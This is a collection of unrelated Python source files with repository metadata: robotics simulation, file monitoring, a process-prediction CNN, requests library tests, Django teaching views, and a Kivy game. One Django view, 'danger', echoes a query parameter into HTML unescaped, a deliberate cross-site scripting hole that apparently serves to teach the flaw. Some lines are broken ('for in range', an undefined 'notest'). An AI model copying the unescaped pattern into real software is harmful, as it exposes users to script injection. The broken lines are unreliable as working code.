ax.plot([0,u1[0]],[1.5,u1[1]],[1.5,u1[2]],color='r')
ax.plot([0,u2[0]],[1.5,u2[1]],[1.5,u2[2]],color='g')
ax.plot([0,u3[0]],[1.5,u3[1]],[1.5,u3[2]],color='b')
plt.show()
img = p.getCameraImage(width=256, height=256, viewMatrix=viewMatrix, projectionMatrix=projectionMatrix)
while 1:
ls = p.getLinkState(kukaId, kukaEndEffectorIndex)
endEffectorPos = [ls[4][i] for i in range(3)]
endEffectorPos[1] = endEffectorPos[1] + 0.05
orn = p.getQuaternionFromEuler([0, -math.pi, 0])
jointPoses = p.calculateInverseKinematics(kukaId, kukaEndEffectorIndex, endEffectorPos, orn, ll, ul,
jr, rp)
p.stepSimulation()
p.setJointMotorControlArray(bodyIndex=kukaId,
jointIndex=[i for i in range(self.numJoints)],
controlMode=p.POSITION_CONTROL,
targetPosition=[jointPoses[i] for in range(self.numJoints)],
force=500,
positionGain=0.03,
velocityGain=1)
# if (hasPrevPose):
# p.addUserDebugLine(prevPose, pos, [0, 0, 0.3], 1, trailDuration)
# p.addUserDebugLine(prevPose1, ls[4], [1, 0, 0], 1, trailDuration)
|
[
"georgesnomicos@gmail.com"
] |
georgesnomicos@gmail.com
|
16dd9d855bb41709fb9316c23fa04e01066c48a3
|
85120b4f57a5c930d9d229a2368f6db151bd4610
|
/support/monitor.py
|
1fd0a183e6e498987c249cca1515d3eee7e9d685
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
egpbos/amuse
|
1f0501d636b5029b22ac01bbad85cfa94ab8b244
|
64b3bc5b7fef9496012b023578c4d71cecef92b7
|
refs/heads/master
| 2020-03-21T12:35:51.671246
| 2018-06-27T12:10:28
| 2018-06-27T12:10:28
| 138,561,660
| 0
| 0
|
Apache-2.0
| 2018-06-25T07:55:19
| 2018-06-25T07:55:18
| null |
UTF-8
|
Python
| false
| false
| 4,976
|
py
|
import time
import urlparse
import threading
import traceback
import json
import nose
import sys
import linecache
import inspect
import os.path
import BaseHTTPServer
import SocketServer
import Queue as queue
from mpi4py import MPI
from nose.plugins.capture import Capture
from nose.plugins.skip import Skip, SkipTest
from nose.core import TestProgram
from multiprocessing import Process, Queue
from optparse import OptionParser
from subprocess import call, Popen, PIPE
from StringIO import StringIO
class MonitoredFile(object):
def __init__(self, path, container):
self.path = path
self.container = container
self.timestamp = self.get_last_modification_time()
def is_file(self):
return True
def check(self, monitor):
if not os.path.exists(self.path):
self.container.remove(self)
monitor.deleted(self)
return
measured_timestamp = self.get_last_modification_time()
if measured_timestamp < 0:
self.container.remove(self)
monitor.errored(self)
return
if self.timestamp < measured_timestamp:
self.timestamp = measured_timestamp
monitor.updated(self)
return
monitor.unchanged(self)
def get_last_modification_time(self):
try:
statinfo = os.stat(self.path)
return statinfo.st_mtime
except:
return -1
def walk(self, monitor):
monitor.found(self)
class MonitoredDirectory(object):
def __init__(self, path, container = None):
self.path = path
self.elements = []
self.container = container
self.path_to_element = {}
self.setup_from_filesystem()
def is_file(self):
return False
def setup_from_filesystem(self):
names = os.listdir(self.path)
for name in names:
path = os.path.join(self.path, name)
if os.path.islink(path):
continue
element = self.new_element(path)
self.elements.append(element)
self.path_to_element[path] = element
def new_element(self, path):
if os.path.isdir(path):
return MonitoredDirectory(path, self)
else:
return MonitoredFile(path, self)
def remove(self, element):
self.elements.remove(element)
del self.path_to_element[element.path]
def check(self, monitor):
if not os.path.exists(self.path):
if not self.container is None:
self.container.remove(self)
monitor.deleted(self)
return
for x in self.elements:
x.check(monitor)
names = os.listdir(self.path)
for name in names:
path = os.path.join(self.path, name)
if not path in self.path_to_element:
element = self.new_element(path)
monitor.created(element)
self.elements.append(element)
self.path_to_element[path] = element
def walk(self, monitor):
monitor.found(self)
for x in self.elements:
x.walk(monitor)
class MonitorDirectories(object):
def __init__(self, paths):
self.elements = map(lambda x : MonitoredDirectory(x), paths)
self.changed = False
self.updated_elements = []
def check(self):
self.changed = False
self.updated_elements = []
for x in self.elements:
x.check(self)
def deleted(self, monitored_element):
if not self.must_monitor_file(monitored_element):
return
self.changed = True
def created(self, monitored_element):
if not self.must_monitor_file(monitored_element):
return
self.changed = True
def unchanged(self, monitored_element):
pass
def errored(self, monitored_element):
print "error while monitoring file: ", monitored_element.path
pass
def updated(self, monitored_element):
if not self.must_monitor_file(monitored_element):
return
self.changed = True
self.updated_elements.append(monitored_element)
def walk(self, callback_function):
self.callback_function = callback_function
for x in self.elements:
x.walk(self)
def found(self, monitored_element):
if not self.must_monitor_file(monitored_element):
return
self.callback_function(monitored_element)
def must_monitor_file(self, monitored_element):
return (
monitored_element.path.endswith('.py') and
not os.path.basename(monitored_element.path).startswith('.')
)
|
[
"vanelteren@6e832d89-e7d1-4ad1-8ca1-873beecccf65"
] |
vanelteren@6e832d89-e7d1-4ad1-8ca1-873beecccf65
|
a2e5f01eb71ec11ddd0fcbda3516cb82caec5dcb
|
8a932874900d869626a05aa49d2ecbe6394b70e3
|
/RelatedMethods/Pasquadibisceglie/adapter.py
|
1618dae83d9dbc0edd9f8fccfa2288a1adb7c4a6
|
[] |
no_license
|
guptam/edbn
|
253918f38c3651fa459ab795946d3656240232ba
|
e54a6678582a620c12848185c56251d1209631f7
|
refs/heads/master
| 2022-11-29T11:55:02.548888
| 2020-08-05T10:02:12
| 2020-08-05T10:02:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,799
|
py
|
from datetime import datetime
import pandas as pd
import numpy as np
import multiprocessing as mp
from functools import partial
from Utils.LogFile import LogFile
seed = 123
np.random.seed(seed)
def get_label(act):
i = 0
list_label = []
while i < len(act):
j = 0
while j < (len(act.iat[i, 0]) - 1):
if j > 0:
list_label.append(act.iat[i, 0][j + 1])
else:
pass
j = j + 1
i = i + 1
return list_label
def dataset_summary(dataset):
df = pd.read_csv(dataset, sep=",")
print("Activity Distribution\n", df['event'].value_counts())
n_caseid = df['case'].nunique()
n_activity = df['Activity'].nunique()
print("Number of CaseID", n_caseid)
print("Number of Unique Activities", n_activity)
print("Number of Activities", df['event'].count())
cont_trace = df['case'].value_counts(dropna=False)
max_trace = max(cont_trace)
print("Max lenght trace", max_trace)
print("Mean lenght trace", np.mean(cont_trace))
print("Min lenght trace", min(cont_trace))
return df, max_trace, n_caseid, n_activity
def get_image(act_val, time_val, max_trace, n_activity):
i = 0
matrix_zero = [max_trace, n_activity, 2]
image = np.zeros(matrix_zero)
list_image = []
while i < len(time_val):
j = 0
list_act = []
list_temp = []
conts = np.zeros(n_activity + 1)
diffs = np.zeros(n_activity + 1)
while j < (len(act_val.iat[i, 0]) - 1):
start_trace = time_val.iat[i, 0][0]
conts[act_val.iat[i, 0][0 + j]] += 1
diffs[act_val.iat[i, 0][0 + j]] = time_val.iat[i, 0][0 + j] - start_trace
list_act.append(conts[1:])
list_temp.append(diffs[1:])
j = j + 1
cont = 0
lenk = len(list_act) - 1
while cont <= lenk:
image[(max_trace - 1) - cont] = np.array(list(zip(list_act[lenk - cont], list_temp[lenk - cont])))
cont = cont + 1
if cont == 1:
pass
else:
list_image.append(image)
image = np.zeros(matrix_zero)
i = i + 1
return list_image
def get_image_from_log(log):
n_activity = len(log.values[log.activity])
matrix_zero = (log.k, n_activity, 2)
list_image = []
for row in log.contextdata.iterrows():
image = np.zeros(matrix_zero)
conts = np.zeros(n_activity + 1)
diffs = np.zeros(n_activity + 1)
starttime = None
for i in range(log.k - 1, -1, -1):
event = row[1]["%s_Prev%i" % (log.activity, i)]
conts[event] += 1
t_raw = row[1]["%s_Prev%i" % (log.time, i)]
if t_raw != 0:
try:
t = datetime.strptime(t_raw, "%Y-%m-%d %H:%M:%S")
except ValueError:
t = datetime.strptime(t_raw, "%Y/%m/%d %H:%M:%S.%f")
if starttime is None:
starttime = t
diffs[event] = (t - starttime).total_seconds()
image[log.k - 1 - i] = np.array(list(zip(conts[1:], diffs[1:])))
list_image.append(image)
return list_image
def get_image_from_log2(log):
n_activity = len(log.values[log.activity])
matrix_zero = (log.k, n_activity, 2)
list_image = []
create_image_func = partial(create_image, matrix_zero=matrix_zero, activity_attr=log.activity, time_attr=log.time)
with mp.Pool(mp.cpu_count()) as p:
list_image = p.map(create_image_func, log.contextdata.iterrows())
return list_image
def create_image(row, matrix_zero, activity_attr, time_attr):
image = np.zeros(matrix_zero)
conts = np.zeros(matrix_zero[1] + 1)
diffs = np.zeros(matrix_zero[1] + 1)
starttime = None
for i in range(matrix_zero[0] - 1, -1, -1):
event = row[1]["%s_Prev%i" % (activity_attr, i)]
conts[event] += 1
t_raw = row[1]["%s_Prev%i" % (time_attr, i)]
if t_raw != 0:
try:
t = datetime.strptime(t_raw, "%Y-%m-%d %H:%M:%S")
except ValueError:
t = datetime.strptime(t_raw, "%Y/%m/%d %H:%M:%S.%f")
if starttime is None:
starttime = t
diffs[event] = (t - starttime).total_seconds()
image[matrix_zero[0] - 1 - i] = np.array(list(zip(conts[1:], diffs[1:])))
return image
def get_label_from_log(log):
list_label = []
for row in log.contextdata.iterrows():
list_label.append(row[1][log.activity])
return list_label
def train(log, epochs=500, early_stop=42):
from keras.models import Sequential
from keras.layers.core import Flatten, Dense
from keras.layers.convolutional import MaxPooling2D
from keras.optimizers import Nadam
from keras.callbacks import EarlyStopping
from keras.layers.normalization import BatchNormalization
from keras.layers import Conv2D, Activation
from keras import regularizers
from keras.utils import np_utils
X_train = get_image_from_log(log)
y_train = get_label_from_log(log)
X_train = np.asarray(X_train)
y_train = np.asarray(y_train)
train_Y_one_hot = np_utils.to_categorical(y_train, len(log.values[log.activity]) + 1)
trace_size = log.k
n_activity = len(log.values[log.activity])
#define neural network architecture
model = Sequential()
reg = 0.0001
input_shape = (trace_size, n_activity, 2)
model.add(Conv2D(32, (2, 2), input_shape=input_shape, padding='same', kernel_initializer='glorot_uniform',
kernel_regularizer=regularizers.l2(reg)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (4, 4), padding='same', kernel_regularizer=regularizers.l2(reg), ))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
if trace_size >= 8:
model.add(Conv2D(128, (8, 8), padding='same', kernel_regularizer=regularizers.l2(reg), ))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(len(log.values[log.activity]) + 1, activation='softmax', name='act_output'))
print(model.summary())
opt = Nadam(lr=0.0002, beta_1=0.9, beta_2=0.999, epsilon=1e-08, schedule_decay=0.004, clipvalue=3)
model.compile(loss={'act_output': 'categorical_crossentropy'}, optimizer=opt, metrics=['accuracy'])
early_stopping = EarlyStopping(monitor='val_loss', patience=early_stop)
model.fit(X_train, {'act_output': train_Y_one_hot}, validation_split=0.2, verbose=1,
callbacks=[early_stopping], batch_size=128, epochs=epochs)
return model
def test(log, model):
from keras.utils import np_utils
X_test = get_image_from_log(log)
y_test = get_label_from_log(log)
X_test = np.asarray(X_test)
y_test = np.asarray(y_test)
test_Y_one_hot = np_utils.to_categorical(y_test, len(log.values[log.activity]) + 1)
score = model.evaluate(X_test, test_Y_one_hot, verbose=1)
print('\nAccuracy on test data: ', score[1])
return score[1]
if __name__ == "__main__":
data = "../../Data/BPIC15_1_sorted_new.csv"
case_attr = "case"
act_attr = "event"
logfile = LogFile(data, ",", 0, None, "completeTime", case_attr,
activity_attr=act_attr, convert=False, k=10)
logfile.convert2int()
logfile.create_k_context()
train_log, test_log = logfile.splitTrainTest(80, case=True, method="train-test")
model = train(train_log, epochs=100, early_stop=10)
notest(test_log, model)
|
[
"stephen.pauwels@uantwerpen.be"
] |
stephen.pauwels@uantwerpen.be
|
1ae7841129119b7eeb89b92cf92f35798bdce555
|
41647db5c90e05b523f51fecfa4e2cb1b3913775
|
/xin.py
|
3f7cb6d52710e622d3734bba8e16ee68bef59be6
|
[] |
no_license
|
jin6818236/shiyanlou-code
|
67baa2d7a33023ed1550ca88ba2ae28f5dce97fc
|
986cbdc6479d14ef6592f5e9d228fa6ae9601d1c
|
refs/heads/master
| 2022-07-13T10:54:47.734503
| 2020-05-16T14:38:21
| 2020-05-16T14:38:21
| 259,810,127
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26
|
py
|
print('书名:疯魔')
|
[
"429405313@qq.com"
] |
429405313@qq.com
|
80577f2a674ed5988bf3a9c97803830f4a433fd2
|
b5c2a98fbd274a0aff49ca70d6fc3e4b26f4e1c5
|
/requests_tests/test_suite_29.py
|
1d163ef61c4ffac5ac4aa7b8fc5e34beb044639f
|
[] |
no_license
|
hughe1/SoftwareTestingResearch
|
3120dc857bcfc7acdbea1ef0fd071b3eb878cc81
|
66d69e7f8791a7b03be95a2d387c7ab452d9a209
|
refs/heads/master
| 2021-07-19T02:56:00.279534
| 2017-10-22T12:25:51
| 2017-10-22T12:25:51
| 108,536,497
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,974
|
py
|
# -*- coding: utf-8 -*-
"""Tests for Requests."""
from __future__ import division
import json
import os
import pickle
import collections
import contextlib
import warnings
import io
import requests
import pytest
from requests.adapters import HTTPAdapter
from requests.auth import HTTPDigestAuth, _basic_auth_str
from requests.compat import (
Morsel, cookielib, getproxies, str, urlparse,
builtin_str, OrderedDict)
from requests.cookies import (
cookiejar_from_dict, morsel_to_cookie)
from requests.exceptions import (
ConnectionError, ConnectTimeout, InvalidSchema, InvalidURL,
MissingSchema, ReadTimeout, Timeout, RetryError, TooManyRedirects,
ProxyError, InvalidHeader, UnrewindableBodyError, SSLError)
from requests.models import PreparedRequest
from requests.structures import CaseInsensitiveDict
from requests.sessions import SessionRedirectMixin
from requests.models import urlencode
from requests.hooks import default_hooks
# from .compat import StringIO, u
# from .utils import override_environ
from urllib3.util import Timeout as Urllib3Timeout
# Requests to this URL should always fail with a connection timeout (nothing
# listening on that port)
TARPIT = 'http://10.255.255.1'
try:
from ssl import SSLContext
del SSLContext
HAS_MODERN_SSL = True
except ImportError:
HAS_MODERN_SSL = False
try:
requests.pyopenssl
HAS_PYOPENSSL = True
except AttributeError:
HAS_PYOPENSSL = False
# -*- coding: utf-8 -*-
import threading
import socket
import time
import pytest
import requests
from testserver.server import Server
# -*- coding: utf-8 -*-
import pytest
from requests.structures import CaseInsensitiveDict, LookupDict
# -*- coding: utf-8 -*-
import os
import copy
from io import BytesIO
import pytest
from requests import compat
from requests.cookies import RequestsCookieJar
from requests.structures import CaseInsensitiveDict
from requests.utils import (
address_in_network, dotted_netmask,
get_auth_from_url, get_encoding_from_headers,
get_encodings_from_content, get_environ_proxies,
guess_filename, guess_json_utf, is_ipv4_address,
is_valid_cidr, iter_slices, parse_dict_header,
parse_header_links, prepend_scheme_if_needed,
requote_uri, select_proxy, should_bypass_proxies, super_len,
to_key_val_list, to_native_string,
unquote_header_value, unquote_unreserved,
urldefragauth, add_dict_to_cookiejar, set_environ)
from requests._internal_utils import unicode_is_ascii
# -*- encoding: utf-8
import sys
import pytest
from requests.help import info
class TestGuessFilename:
@pytest.mark.parametrize(
'value', (1, type('Fake', (object,), {'name': 1})()),
)
def test_guess_filename_invalid(self, value):
assert guess_filename(value) is None
@pytest.mark.parametrize(
'value, expected_type', (
(b'value', compat.bytes),
(b'value'.decode('utf-8'), compat.str)
))
def test_guess_filename_valid(self, value, expected_type):
obj = type('Fake', (object,), {'name': value})()
result = guess_filename(obj)
assert result == value
assert isinstance(result, expected_type)
def test_digestauth_401_count_reset_on_redirect():
"""Ensure we correctly reset num_401_calls after a successful digest auth,
followed by a 302 redirect to another digest auth prompt.
See https://github.com/requests/requests/issues/1979.
"""
text_401 = (b'HTTP/1.1 401 UNAUTHORIZED\r\n'
b'Content-Length: 0\r\n'
b'WWW-Authenticate: Digest nonce="6bf5d6e4da1ce66918800195d6b9130d"'
b', opaque="372825293d1c26955496c80ed6426e9e", '
b'realm="me@kennethreitz.com", qop=auth\r\n\r\n')
text_302 = (b'HTTP/1.1 302 FOUND\r\n'
b'Content-Length: 0\r\n'
b'Location: /\r\n\r\n')
text_200 = (b'HTTP/1.1 200 OK\r\n'
b'Content-Length: 0\r\n\r\n')
expected_digest = (b'Authorization: Digest username="user", '
b'realm="me@kennethreitz.com", '
b'nonce="6bf5d6e4da1ce66918800195d6b9130d", uri="/"')
auth = requests.auth.HTTPDigestAuth('user', 'pass')
def digest_response_handler(sock):
# Respond to initial GET with a challenge.
request_content = consume_socket_content(sock, timeout=0.5)
assert request_content.startswith(b"GET / HTTP/1.1")
sock.send(text_401)
# Verify we receive an Authorization header in response, then redirect.
request_content = consume_socket_content(sock, timeout=0.5)
assert expected_digest in request_content
sock.send(text_302)
# Verify Authorization isn't sent to the redirected host,
# then send another challenge.
request_content = consume_socket_content(sock, timeout=0.5)
assert b'Authorization:' not in request_content
sock.send(text_401)
# Verify Authorization is sent correctly again, and return 200 OK.
request_content = consume_socket_content(sock, timeout=0.5)
assert expected_digest in request_content
sock.send(text_200)
return request_content
close_server = threading.Event()
server = Server(digest_response_handler, wait_to_close_event=close_server)
with server as (host, port):
url = 'http://{0}:{1}/'.format(host, port)
r = requests.get(url, auth=auth)
# Verify server succeeded in authenticating.
assert r.status_code == 200
# Verify Authorization was sent in final request.
assert 'Authorization' in r.request.headers
assert r.request.headers['Authorization'].startswith('Digest ')
# Verify redirect happened as we expected.
assert r.history[0].status_code == 302
close_server.set()
def hook(value):
return value[1:]
class TestIsIPv4Address:
def test_valid(self):
assert is_ipv4_address('8.8.8.8')
@pytest.mark.parametrize('value', ('8.8.8.8.8', 'localhost.localdomain'))
def test_invalid(self, value):
assert not is_ipv4_address(value)
class TestCaseInsensitiveDict:
@pytest.mark.parametrize(
'cid', (
CaseInsensitiveDict({'Foo': 'foo', 'BAr': 'bar'}),
CaseInsensitiveDict([('Foo', 'foo'), ('BAr', 'bar')]),
CaseInsensitiveDict(FOO='foo', BAr='bar'),
))
def test_init(self, cid):
assert len(cid) == 2
assert 'foo' in cid
assert 'bar' in cid
def test_docstring_example(self):
cid = CaseInsensitiveDict()
cid['Accept'] = 'application/json'
assert cid['aCCEPT'] == 'application/json'
assert list(cid) == ['Accept']
def test_len(self):
cid = CaseInsensitiveDict({'a': 'a', 'b': 'b'})
cid['A'] = 'a'
assert len(cid) == 2
def test_getitem(self):
cid = CaseInsensitiveDict({'Spam': 'blueval'})
assert cid['spam'] == 'blueval'
assert cid['SPAM'] == 'blueval'
def test_fixes_649(self):
"""__setitem__ should behave case-insensitively."""
cid = CaseInsensitiveDict()
cid['spam'] = 'oneval'
cid['Spam'] = 'twoval'
cid['sPAM'] = 'redval'
cid['SPAM'] = 'blueval'
assert cid['spam'] == 'blueval'
assert cid['SPAM'] == 'blueval'
assert list(cid.keys()) == ['SPAM']
def test_delitem(self):
cid = CaseInsensitiveDict()
cid['Spam'] = 'someval'
del cid['sPam']
assert 'spam' not in cid
assert len(cid) == 0
def test_contains(self):
cid = CaseInsensitiveDict()
cid['Spam'] = 'someval'
assert 'Spam' in cid
assert 'spam' in cid
assert 'SPAM' in cid
assert 'sPam' in cid
assert 'notspam' not in cid
def test_get(self):
cid = CaseInsensitiveDict()
cid['spam'] = 'oneval'
cid['SPAM'] = 'blueval'
assert cid.get('spam') == 'blueval'
assert cid.get('SPAM') == 'blueval'
assert cid.get('sPam') == 'blueval'
assert cid.get('notspam', 'default') == 'default'
def test_update(self):
cid = CaseInsensitiveDict()
cid['spam'] = 'blueval'
cid.update({'sPam': 'notblueval'})
assert cid['spam'] == 'notblueval'
cid = CaseInsensitiveDict({'Foo': 'foo', 'BAr': 'bar'})
cid.update({'fOO': 'anotherfoo', 'bAR': 'anotherbar'})
assert len(cid) == 2
assert cid['foo'] == 'anotherfoo'
assert cid['bar'] == 'anotherbar'
def test_update_retains_unchanged(self):
cid = CaseInsensitiveDict({'foo': 'foo', 'bar': 'bar'})
cid.update({'foo': 'newfoo'})
assert cid['bar'] == 'bar'
def test_iter(self):
cid = CaseInsensitiveDict({'Spam': 'spam', 'Eggs': 'eggs'})
keys = frozenset(['Spam', 'Eggs'])
assert frozenset(iter(cid)) == keys
def test_equality(self):
cid = CaseInsensitiveDict({'SPAM': 'blueval', 'Eggs': 'redval'})
othercid = CaseInsensitiveDict({'spam': 'blueval', 'eggs': 'redval'})
assert cid == othercid
del othercid['spam']
assert cid != othercid
assert cid == {'spam': 'blueval', 'eggs': 'redval'}
assert cid != object()
def test_setdefault(self):
cid = CaseInsensitiveDict({'Spam': 'blueval'})
assert cid.setdefault('spam', 'notblueval') == 'blueval'
assert cid.setdefault('notspam', 'notblueval') == 'notblueval'
def test_lower_items(self):
cid = CaseInsensitiveDict({
'Accept': 'application/json',
'user-Agent': 'requests',
})
keyset = frozenset(lowerkey for lowerkey, v in cid.lower_items())
lowerkeyset = frozenset(['accept', 'user-agent'])
assert keyset == lowerkeyset
def test_preserve_key_case(self):
cid = CaseInsensitiveDict({
'Accept': 'application/json',
'user-Agent': 'requests',
})
keyset = frozenset(['Accept', 'user-Agent'])
assert frozenset(i[0] for i in cid.items()) == keyset
assert frozenset(cid.keys()) == keyset
assert frozenset(cid) == keyset
def test_preserve_last_key_case(self):
cid = CaseInsensitiveDict({
'Accept': 'application/json',
'user-Agent': 'requests',
})
cid.update({'ACCEPT': 'application/json'})
cid['USER-AGENT'] = 'requests'
keyset = frozenset(['ACCEPT', 'USER-AGENT'])
assert frozenset(i[0] for i in cid.items()) == keyset
assert frozenset(cid.keys()) == keyset
assert frozenset(cid) == keyset
def test_copy(self):
cid = CaseInsensitiveDict({
'Accept': 'application/json',
'user-Agent': 'requests',
})
cid_copy = cid.copy()
assert cid == cid_copy
cid['changed'] = True
assert cid != cid_copy
|
[
"mperrott6@gmail.com"
] |
mperrott6@gmail.com
|
d086ad14264a8733e57a34e1b791e87cceb94aea
|
77653811587e0d9285380ae866952b3fcf09ae80
|
/dj4e-samples/views/home/views.py
|
5b39313b99df54f67ed3604356cbc6bfc4b1ded2
|
[
"MIT",
"CC-BY-3.0"
] |
permissive
|
natc23/SI_364_Local
|
477c82a74f7ac34bcca9db33c11ea6ec1c333cd5
|
e72c98bef29ee9d6cdb1b9c120152ffc007293d2
|
refs/heads/master
| 2020-04-24T00:37:57.639011
| 2019-04-12T01:17:48
| 2019-04-12T01:17:48
| 171,571,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,293
|
py
|
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.utils.html import escape
from django.views import View
# Create your views here.
def funky(request):
response = """<html><body><p>This is the funky function sample</p>
<p>This sample code is available at
<a href="https://github.com/csev/dj4e-samples">
https://github.com/csev/dj4e-samples</a></p>
</body></html>"""
return HttpResponse(response)
def danger(request) :
response = """<html><body>
<p>Your guess was """+request.GET['guess']+"""</p>
</body></html>"""
return HttpResponse(response)
def game(request) :
response = """<html><body>
<p>Your guess was """+escape(request.GET['guess'])+"""</p>
</body></html>"""
return HttpResponse(response)
def bounce(request) :
return HttpResponseRedirect('https://www.dj4e.com/lessons')
# https://docs.djangoproject.com/en/2.1/topics/class-based-views/
class MainView(View) :
def get(self, request):
response = """<html><body><p>Hello world MainView in HTML</p>
<p>This sample code is available at
<a href="https://github.com/csev/dj4e-samples">
https://github.com/csev/dj4e-samples</a></p>
</body></html>"""
return HttpResponse(response)
|
[
"nataliecieslak@yahoo.com"
] |
nataliecieslak@yahoo.com
|
652ef4afeaa7ab67f8b77fac953668d2568a8017
|
43c46e3ec632fd30d6705370b81fc7f94b8f0020
|
/main.py
|
0899c3ff1f7ebe8478ce752d0346d89fe553a33e
|
[] |
no_license
|
DavidJoanes/KIVY-GAMES
|
c401856e8a098270f401b2e98c07ced6b07ff421
|
045e1da375df9fd1094cb3feb809fed6a0c33dfc
|
refs/heads/master
| 2023-06-21T23:32:34.613921
| 2021-07-16T21:04:03
| 2021-07-16T21:04:03
| 379,648,497
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,874
|
py
|
from kivy import platform
from kivy.config import Config
from kivy.core.audio import SoundLoader
Config.set('graphics', 'width', '900')
Config.set('graphics', 'height', '400')
from kivymd.app import MDApp
from kivy.uix.relativelayout import RelativeLayout
import random, highscoreDatabase
from kivy.lang import Builder
from kivy.core.window import Window
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.graphics import Color, Line, Quad, Triangle
from kivy.properties import NumericProperty, Clock, ObjectProperty, StringProperty, BooleanProperty
from kivy.uix.actionbar import ActionBar
Builder.load_file("home.kv")
Builder.load_string('''
<ActionBar>:
pos_hint: {'top':1}
ActionView:
use_separator: True
ActionPrevious:
title: 'Spaceship Troopers'
with_previous: False
ActionOverflow:
ActionButton:
text: 'Btn0'
icon: 'atlas://data/images/defaulttheme/audio-volume-high'
ActionButton:
text: 'Help'
ActionGroup:
text: 'Difficulty'
ActionButton:
text: 'Novice'
ActionButton:
text: 'Professional'
ActionButton:
text: 'Expert'
ActionButton:
text: 'About'
''')
class CustomActionBar(ActionBar):
pass
class MainWidget(RelativeLayout):
from transforms import transform, transform_2D, transform_perspective
from userActions import keyboard_closed, on_keyboard_up, on_keyboard_down, on_touch_up, on_touch_down
home_widget = ObjectProperty()
perspective_point_x = NumericProperty(0)
perspective_point_y = NumericProperty(0)
vertical_NB_LINES = 8
vertical_LINE_SPACING = 0.3 # percentage of screen width
vertical_lines = []
horizontal_NB_LINES = 16
horizontal_LINE_SPACING = 0.1 # percentage of screen height
horizontal_lines = []
SPEED_Y = .05 # speed_y axis
SPEED_X = 1
current_offset_y = 0
current_y_loop = 0
current_speed_x = 0
current_offset_x = 0
number_of_tiles = 16
tiles = []
# tile_x = 1
# tile_y = 3
tiles_coordinates = []
ship = None
ship_width = 0.1
ship_height = 0.035
ship_base = 0.04
ship_coordinates = [(0, 0), (0, 0), (0, 0)]
game_over_state = False
game_started_state = False
start_game_enabled = BooleanProperty(False)
easy_mode_enabled = BooleanProperty(True)
medium_mode_enabled = BooleanProperty(True)
hard_mode_enabled = BooleanProperty(True)
game_mode = StringProperty("")
easy = False
medium = False
hard = False
home_title = StringProperty("S P A C E S H I P T R O O P E R S")
home_button_title = StringProperty("START")
new_highscore_title = StringProperty("")
highscore = []
high_scores = StringProperty("HIGH SCORES: ")
high_scores_enabled = BooleanProperty(True)
score_text = StringProperty()
begin_sound = None
welcome_sound = None
game_sound = None
game_over_sound = None
restart_sound = None
def __init__(self, **kwargs):
super(MainWidget, self).__init__(**kwargs)
# print("Init W: " +str(self.width)+ " H: " +str(self.height))
self.init_audio()
self.init_vertical_lines()
self.init_horizontal_lines()
self.init_tiles()
self.init_ship()
# self.prefill_tiles_coordinates()
# self.generate_tiles_coordinate()
self.reset_game()
if self.is_desktop():
self._keyboard = Window.request_keyboard(self.keyboard_closed, self)
self._keyboard.bind(on_key_down=self.on_keyboard_down)
self._keyboard.bind(on_key_up=self.on_keyboard_up)
Clock.schedule_interval(self.update, 1 / 60)
self.welcome_sound.play()
def init_audio(self):
self.welcome_sound = SoundLoader.load("audio/welcome.wav")
self.begin_sound = SoundLoader.load("audio/begin.wav")
self.game_sound = SoundLoader.load("audio/game_music2.mp3")
self.game_sound2 = SoundLoader.load("audio/game_music3.mp3")
self.game_over_sound = SoundLoader.load("audio/game_over.wav")
self.restart_sound = SoundLoader.load("audio/restart.wav")
self.welcome_sound.volume = 1
self.begin_sound.volume = .5
self.game_sound.volume = 1
self.game_sound2.volume = 1
self.game_over_sound.volume = .7
self.restart_sound.volume = .8
def reset_game(self):
self.current_offset_y = 0
self.current_y_loop = 0
self.current_speed_x = 0
self.current_offset_x = 0
self.tiles_coordinates = []
self.prefill_tiles_coordinates()
self.generate_tiles_coordinate()
self.score_text = "SCORE: " + str(self.current_y_loop)
self.game_over_state = False
def is_desktop(self):
if platform in ("linux", "win", "macosx"):
return True
return False
def init_ship(self):
with self.canvas:
Color(0, 0, 0)
self.ship = Triangle()
def update_ship(self):
center_x = self.width / 2
base_y = self.ship_base * self.height
ship_half_width = (self.ship_width * self.width) / 2
ship_height = self.ship_height * self.height
# 2
# 1 3
# self.transform
self.ship_coordinates[0] = (center_x - ship_half_width, base_y)
self.ship_coordinates[1] = (center_x, base_y + ship_height)
self.ship_coordinates[2] = (center_x + ship_half_width, base_y)
x1, y1 = self.transform(*self.ship_coordinates[0])
x2, y2 = self.transform(*self.ship_coordinates[1])
x3, y3 = self.transform(*self.ship_coordinates[2])
self.ship.points = [x1, y1, x2, y2, x3, y3]
def check_ship_collision(self):
for x in range(0, len(self.tiles_coordinates)):
tile_x, tile_y = self.tiles_coordinates[x]
if tile_y > self.current_y_loop + 1:
return False
if self.check_for_collision_with_tile(tile_x, tile_y):
return True
return False
def check_for_collision_with_tile(self, tile_x, tile_y):
xmin, ymin = self.get_tile_coordinates(tile_x, tile_y)
xmax, ymax = self.get_tile_coordinates(tile_x + 1, tile_y + 1)
for x in range(0, 3):
point_x, point_y = self.ship_coordinates[x]
if xmin <= point_x <= xmax and ymin <= point_y <= ymax:
return True
return False
def init_tiles(self):
with self.canvas:
Color(1, 1, 1)
for x in range(0, self.number_of_tiles):
self.tiles.append(Quad())
def prefill_tiles_coordinates(self):
for x in range(0, 10):
self.tiles_coordinates.append((0, x))
def generate_tiles_coordinate(self):
last_value_of_x = 0
last_value_of_y = 0
# clean the coordinates that are out of the screen
# tile_y < self.current_y_loop
for x in range(len(self.tiles_coordinates) - 1, -1, -1):
if self.tiles_coordinates[x][1] < self.current_y_loop:
del self.tiles_coordinates[x]
if len(self.tiles_coordinates) > 0:
last_coordinates = self.tiles_coordinates[-1]
last_value_of_x = last_coordinates[0]
